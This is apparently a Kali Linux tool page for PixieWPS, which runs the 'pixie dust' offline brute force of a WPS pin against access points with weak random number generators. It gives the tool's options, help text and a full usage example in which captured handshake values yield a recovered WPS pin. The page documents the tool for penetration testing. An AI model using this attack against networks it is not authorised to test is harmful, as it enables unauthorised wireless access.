PixieWPS Package Description

Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some APs (pixie dust attack). It is meant for educational purposes only. All credits for the research go to Dominique Bongard.


  • Checksum optimization: it’ll try first for valid PINs (11’000);
  • Reduced entropy of the seed from 32 to 25 bits for the C LCG pseudo-random function;
  • Small Diffie-Hellman keys: don’t need to specify the Public Registrar Key if the same option is used with Reaver.

The program will also try first with E-S0 = E-S1 = 0, then it’ll tries to bruteforce the seed of the PRNG if the –e-nonce option is specificed.

Source: https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool
PixieWPS Homepage | Kali PixieWPS Repo
Kali Forum Thread | Community Research Thread

  • Author: wiire
  • License: GPLv3

Tools included in the PixieWPS package

PixieWPS – Offline attack for WPS pin
root@kali:~# pixiewps -h

 Pixiewps 1.4 WPS pixie-dust attack tool
 Copyright (c) 2015-2017, wiire <wi7ire@gmail.com>

 Usage: pixiewps <arguments>

 Required arguments:

   -e, --pke         : Enrollee public key
   -r, --pkr         : Registrar public key
   -s, --e-hash1     : Enrollee hash-1
   -z, --e-hash2     : Enrollee hash-2
   -a, --authkey     : Authentication session key
   -n, --e-nonce     : Enrollee nonce

 Optional arguments:

   -m, --r-nonce     : Registrar nonce
   -b, --e-bssid     : Enrollee BSSID
   -v, --verbosity   : Verbosity level 1-3, 1 is quietest           [3]
   -o, --output      : Write output to file
   -j, --jobs        : Number of parallel threads to use         [Auto]

   -h                : Display this usage screen
   --help            : Verbose help and more usage examples
   -V, --version     : Display version

   --mode N[,... N]  : Mode selection, comma separated           [Auto]
   --start [mm/]yyyy : Starting date             (only mode 3) [+1 day]
   --end   [mm/]yyyy : Ending date               (only mode 3) [-1 day]
   -f, --force       : Bruteforce full range     (only mode 3)

 Miscellaneous arguments:

   -7, --m7-enc      : Recover encrypted settings from M7 (only mode 3)
   -5, --m5-enc      : Recover secret nonce from M5       (only mode 3)

 Example (use --help for more):

 pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>


PixieWPS Usage Example

root@kali:~# pixiewps \
>    -a 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa:d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c \
>    -e d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5:75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c:b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:35:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72:c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:fa:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d:79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d9:f8:68:80:11:55:d7:44:6a \
>    -r bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1:d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:36:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7:79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0:c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:93:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b:33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36:24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:ca:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48:c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4:a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:01:a4:29:77:a9:d4:81:d4:0e \
>    -s 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba:ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 \
>    -z b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec \
>    -n 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00

 Pixiewps 1.4

 [?] Mode:     1 (RT/MT/CL)
 [*] Seed N1:  -
 [*] Seed ES1: 0x00000000
 [*] Seed ES2: 0x00000000
 [*] PSK1:     d4eb0c2a3815e1a03d70db7431eb53a3
 [*] PSK2:     d3b7e623f31d220a23ea07bb7f76658b
 [*] ES1:      00000000000000000000000000000000
 [*] ES2:      00000000000000000000000000000000
 [+] WPS pin:  04847533

 [*] Time taken: 0 s 4 ms